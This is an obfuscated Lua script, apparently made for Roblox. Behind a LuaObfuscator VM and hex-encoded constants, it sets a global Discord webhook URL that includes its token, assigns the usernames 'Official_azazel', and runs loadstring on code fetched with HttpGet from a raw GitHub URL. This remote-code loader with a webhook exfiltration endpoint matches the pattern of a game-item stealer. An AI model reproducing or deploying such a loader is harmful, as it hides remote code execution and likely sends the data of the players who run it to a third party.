--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v84=0;while true do if (v84==0) then v19=v0(v3(v30,1,1));return "";end end else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v30,16));if v19 then local v102=0;local v103;while true do if (v102==1) then return v103;end if (v102==0) then v103=v5(v86,v19);v19=nil;v102=1;end end else return v86;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v87=(v31/((5 -3)^(v32-1)))%(((882 -(282 + 595)) -3)^(((v33-(1638 -(1523 + 114))) -(v32-1)) + (1 -0))) ;return v87-(v87%(2 -1)) ;else local v88=619 -(88 + 467 + 58 + 6) ;local v89;while true do if (v88==0) then v89=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v89 + v89))>=v89) and (928 -(214 + 713))) or (0 + 0) ;end end end end local function v21()local v34=(117 -(32 + 85)) -0 ;local v35;while true do if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(67 + 1 + 997)) ;v34=1271 -(226 + 1044) ;end if (v34==(4 -3)) then return v35;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if (v36==(957 -(892 + 65))) then v37,v38=v1(v16,v18,v18 + (4 -2) );v18=v18 + 2 ;v36=1 -(350 -(87 + 263)) ;end if (v36==1) then return (v38 * (469 -213)) + v37 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (184 -(67 + 113)) ;return (v42 * 16777216) + (v41 * (48056 + 17480)) + (v40 * (628 -372)) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=(860 -(814 + 45)) + 0 ;local v46=(v20(v44,792 -(368 + 423) ,79 -59 ) * ((954 -(802 + (547 -397)))^((5 + 80) -53))) + v43 ;local v47=v20(v44,(164 + 299) -(416 + 26) ,55 -24 );local v48=((v20(v44,102 -70 )==(1 + 0)) and  -(998 -(915 + 82))) or (1 -0) ;if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else v47=1 + 0 ;v45=0 + 0 ;end elseif (v47==(3234 -(1069 + 118))) then return ((v46==(0 -(0 -0))) and (v48 * ((1139 -(116 + (1907 -(261 + 624))))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(601 + (749 -327)) ) * (v45 + (v46/((1 + 1)^(92 -40)))) ;end local function v25(v49)local v50;if  not v49 then local v90=1080 -(1020 + 60) ;while true do if (((4899 -3476) -(630 + 793))==v90) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;local v51={};for v68=(1748 -(760 + 987)) + 0 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v52~=2) then else v57=nil;v58=nil;v52=7 -4 ;end if ((1769 -(1749 + 20))~=v52) then else v53=0 + 0 ;v54=nil;v52=1;end if (v52~=(1326 -(1249 + 73))) then else v61=nil;while true do if (v53==1) then local v99=0 + 0 ;while true do if (v99==(1146 -(466 + 679))) then v53=2;break;end if (v99==0) then v56=nil;v57=nil;v99=2 -1 ;end end end if ((5 -3)==v53) then v58=nil;v59=nil;v53=3;end if (v53~=(1900 -(106 + 1794))) then else local v100=0 + 0 ;while true do if (0~=v100) then else v54=0 + 0 ;v55=nil;v100=2 -1 ;end if (v100==(2 -1)) then v53=115 -(4 + 110) ;break;end end end if (v53==3) then local v101=584 -(57 + 527) ;while true do if (v101~=0) then else v60=nil;v61=nil;v101=1;end if (v101~=1) then else v53=4;break;end end end if (v53==4) then while true do if (v54~=3) then else v61=nil;while true do local v107=1427 -(41 + 1386) ;local v108;local v109;while true do if (v107~=0) then else v108=103 -(17 + 86) ;v109=nil;v107=1;end if (1==v107) then while true do if (v108==(0 + 0)) then v109=0 -0 ;while true do if (v109==1) then if (v55~=(2 -1)) then else local v160=166 -(122 + 44) ;while true do if (v160==0) then local v161=0;local v162;while true do if (0==v161) then v162=0 -0 ;while true do if (v162==(3 -2)) then v160=1 + 0 ;break;end if (v162~=(0 + 0)) then else local v170=0 -0 ;while true do if (v170~=(65 -(30 + 35))) then else v60=v23();v61={};v170=1 + 0 ;end if (v170~=(1258 -(1043 + 214))) then else v162=3 -2 ;break;end end end end break;end end end if (v160~=(1214 -(323 + 889))) then else v55=5 -3 ;break;end if (v160~=1) then else local v163=580 -(361 + 219) ;local v164;while true do if (v163~=0) then else v164=0;while true do if (v164~=0) then else local v171=320 -(53 + 267) ;while true do if (v171~=1) then else v164=1 + 0 ;break;end if (v171~=0) then else for v176=1,v60 do local v177=0;local v178;local v179;while true do if ((413 -(15 + 398))~=v177) then else v178=v21();v179=nil;v177=983 -(18 + 964) ;end if ((3 -2)~=v177) then else if (v178==1) then v179=v21()~=0 ;elseif (v178==(2 + 0)) then v179=v24();elseif (v178==(2 + 1)) then v179=v25();end v61[v176]=v179;break;end end end v59[3]=v21();v171=1;end end end if (v164~=(851 -(20 + 830))) then else v160=2;break;end end break;end end end end end break;end if (v109==(0 + 0)) then local v159=0;while true do if (v159~=0) then else if ((128 -(116 + 10))~=v55) then else local v165=0;local v166;while true do if (v165==0) then v166=0;while true do local v169=0;while true do if (v169~=0) then else if (0==v166) then local v174=0;local v175;while true do if (v174~=(0 + 0)) then else v175=738 -(542 + 196) ;while true do if (v175~=(0 -0)) then else for v181=1,v23() do local v182=0 + 0 ;local v183;local v184;local v185;while true do if (v182~=1) then else v185=nil;while true do if (v183==(0 + 0)) then local v188=0 + 0 ;while true do if (v188==0) then v184=0;v185=nil;v188=1;end if (v188~=(2 -1)) then else v183=1;break;end end end if (v183~=(2 -1)) then else while true do if ((1551 -(1126 + 425))==v184) then v185=v21();if (v20(v185,406 -(118 + 287) ,3 -2 )~=0) then else local v189=1121 -(118 + 1003) ;local v190;local v191;local v192;local v193;local v194;while true do if (v189~=2) then else v194=nil;while true do if (v190==(5 -3)) then while true do if (2==v191) then local v197=0;while true do if (v197==0) then local v206=377 -(142 + 235) ;while true do if (v206~=0) then else local v207=0;while true do if (v207~=(4 -3)) then else v206=1;break;end if (v207~=0) then else if (v20(v193,1 + 0 ,1)==(978 -(553 + 424))) then v194[3 -1 ]=v61[v194[2 + 0 ]];end if (v20(v193,2 + 0 ,2)==1) then v194[2 + 1 ]=v61[v194[2 + 1 ]];end v207=1;end end end if (v206~=(1 + 0)) then else v197=1;break;end end end if (v197==1) then v191=6 -3 ;break;end end end if (v191~=(7 -4)) then else if (v20(v193,3,3)==(2 -1)) then v194[2 + 2 ]=v61[v194[4]];end v56[v181]=v194;break;end if (v191==(0 -0)) then local v199=753 -(239 + 514) ;local v200;local v201;while true do if (v199~=(0 + 0)) then else v200=1329 -(797 + 532) ;v201=nil;v199=1;end if (v199~=1) then else while true do if (v200~=(0 + 0)) then else v201=0 + 0 ;while true do if (v201~=0) then else local v210=0;while true do if (v210~=1) then else v201=2 -1 ;break;end if (v210~=(1202 -(373 + 829))) then else v192=v20(v185,2,3);v193=v20(v185,4,6);v210=732 -(476 + 255) ;end end end if (v201==1) then v191=1131 -(369 + 761) ;break;end end break;end end break;end end end if (v191==1) then local v202=0;local v203;while true do if (v202==0) then v203=0 + 0 ;while true do if (v203==(0 -0)) then local v208=0 -0 ;local v209;while true do if (v208~=0) then else v209=0;while true do if (v209~=0) then else local v215=238 -(64 + 174) ;while true do if (v215==1) then v209=1;break;end if (v215~=(0 + 0)) then else v194={v22(),v22(),nil,nil};if (v192==0) then local v216=0;local v217;while true do if (0~=v216) then else v217=336 -(144 + 192) ;while true do if (v217~=(216 -(42 + 174))) then else v194[3]=v22();v194[4 + 0 ]=v22();break;end end break;end end elseif (v192==(1 + 0)) then v194[3]=v23();elseif (v192==(1 + 1)) then v194[3]=v23() -((1506 -(363 + 1141))^(1596 -(1183 + 397))) ;elseif (v192==3) then local v222=0;while true do if (v222~=(0 -0)) then else v194[3]=v23() -((2 + 0)^16) ;v194[4]=v22();break;end end end v215=1;end end end if (v209~=1) then else v203=1 + 0 ;break;end end break;end end end if ((1976 -(1913 + 62))~=v203) then else v191=2;break;end end break;end end end end break;end if (v190~=(1 + 0)) then else local v195=0;local v196;while true do if (v195~=0) then else v196=0 -0 ;while true do if ((1933 -(565 + 1368))==v196) then v193=nil;v194=nil;v196=3 -2 ;end if (v196~=1) then else v190=2;break;end end break;end end end if (v190==(1661 -(1477 + 184))) then v191=0;v192=nil;v190=1 -0 ;end end break;end if (v189==1) then v192=nil;v193=nil;v189=2;end if (v189~=0) then else v190=0 + 0 ;v191=nil;v189=857 -(564 + 292) ;end end end break;end end break;end end break;end if (v182==0) then v183=0;v184=nil;v182=1 -0 ;end end end for v186=2 -1 ,v23() do v57[v186-1 ]=v28();end v175=1;end if (1==v175) then v166=305 -(244 + 60) ;break;end end break;end end end if (v166==(1 + 0)) then return v59;end break;end end end break;end end end if (v55==0) then local v167=476 -(41 + 435) ;while true do if (v167==1) then v58={};v59={v56,v57,nil,v58};v167=2;end if (v167==2) then v55=1 + 0 ;break;end if (v167~=(1613 -(1565 + 48))) then else local v168=0 + 0 ;while true do if (v168~=0) then else local v172=0;while true do if (v172==1) then v168=1139 -(782 + 356) ;break;end if (v172~=0) then else v56={};v57={};v172=1;end end end if (v168==(268 -(176 + 91))) then v167=1;break;end end end end end v159=2 -1 ;end if (v159==(1 -0)) then v109=1093 -(975 + 117) ;break;end end end end break;end end break;end end end break;end if (v54~=(1875 -(157 + 1718))) then else local v104=0;while true do if (v104==0) then v55=0;v56=nil;v104=1 + 0 ;end if (v104==(3 -2)) then v54=3 -2 ;break;end end end if (v54~=1) then else local v105=1018 -(697 + 321) ;local v106;while true do if (v105~=0) then else v106=0 -0 ;while true do if (v106~=1) then else v54=2;break;end if (v106~=0) then else local v129=0 -0 ;while true do if (v129==0) then v57=nil;v58=nil;v129=1;end if (v129~=1) then else v106=1;break;end end end end break;end end end if (v54==(4 -2)) then v59=nil;v60=nil;v54=2 + 1 ;end end break;end end break;end if (v52==3) then v59=nil;v60=nil;v52=6 -2 ;end if ((2 -1)~=v52) then else v55=nil;v56=nil;v52=1229 -(322 + 905) ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v91=0,v78 do if (v91>=v72) then v76[v91-v72 ]=v77[v91 + 1 ];else v80[v91]=v77[v91 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v92=0;while true do if (v92==0) then v82=v70[v74];v83=v82[1];v92=1;end if (v92==1) then if (v83<=10) then if (v83<=4) then if (v83<=1) then if (v83==0) then v80[v82[2]]();elseif (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83<=2) then v74=v82[3];elseif (v83==3) then local v131=v82[2];v80[v131]=v80[v131](v13(v80,v131 + 1 ,v75));else local v133=v82[2];local v134=v80[v82[3]];v80[v133 + 1 ]=v134;v80[v133]=v134[v82[4]];end elseif (v83<=7) then if (v83<=5) then v80[v82[2]]=v82[3]~=0 ;elseif (v83>6) then v80[v82[2]]=v64[v82[3]];else v80[v82[2]]=v82[3]~=0 ;end elseif (v83<=8) then v80[v82[2]][v82[3]]=v82[4];elseif (v83==9) then v80[v82[2]]=v82[3];else v80[v82[2]]=v64[v82[3]];end elseif (v83<=15) then if (v83<=12) then if (v83==11) then do return;end else local v114=v82[2];v80[v114]=v80[v114](v13(v80,v114 + 1 ,v75));end elseif (v83<=13) then local v116=v82[2];local v117,v118=v73(v80[v116](v13(v80,v116 + 1 ,v82[3])));v75=(v118 + v116) -1 ;local v119=0;for v125=v116,v75 do local v126=0;while true do if (v126==0) then v119=v119 + 1 ;v80[v125]=v117[v119];break;end end end elseif (v83==14) then do return;end else v80[v82[2]]();end elseif (v83<=18) then if (v83<=16) then v74=v82[3];elseif (v83>17) then local v145=v82[2];local v146=v80[v82[3]];v80[v145 + 1 ]=v146;v80[v145]=v146[v82[4]];elseif (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83<=19) then local v121=v82[2];local v122,v123=v73(v80[v121](v13(v80,v121 + 1 ,v82[3])));v75=(v123 + v121) -1 ;local v124=0;for v127=v121,v75 do local v128=0;while true do if (v128==0) then v124=v124 + 1 ;v80[v127]=v122[v124];break;end end end elseif (v83>20) then v80[v82[2]][v82[3]]=v82[4];else v80[v82[2]]=v82[3];end v74=v74 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132313338343836303238343632343931362F6C674370784F6865445F6F574A464E6E724A6D72773053526B2D362D44616838452O6A66724F6958785152727472767548716D7944716D6F35494253342D693648427335030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030F3O004F2O66696369616C5F617A617A656C03093O00557365724E616D653200173O0012093O00013O0026013O000E000100020004023O000E0001001207000100033O003015000100040005001207000100063O001207000200073O002004000200020008001209000400094O0005000500014O0013000200054O000C00013O00024O0001000100010004023O001600010026013O0001000100010004023O00010001001207000100033O0030150001000A000B001207000100033O0030150001000C000B0012093O00023O0004023O000100012O000B3O00017O00",v9(),...);end
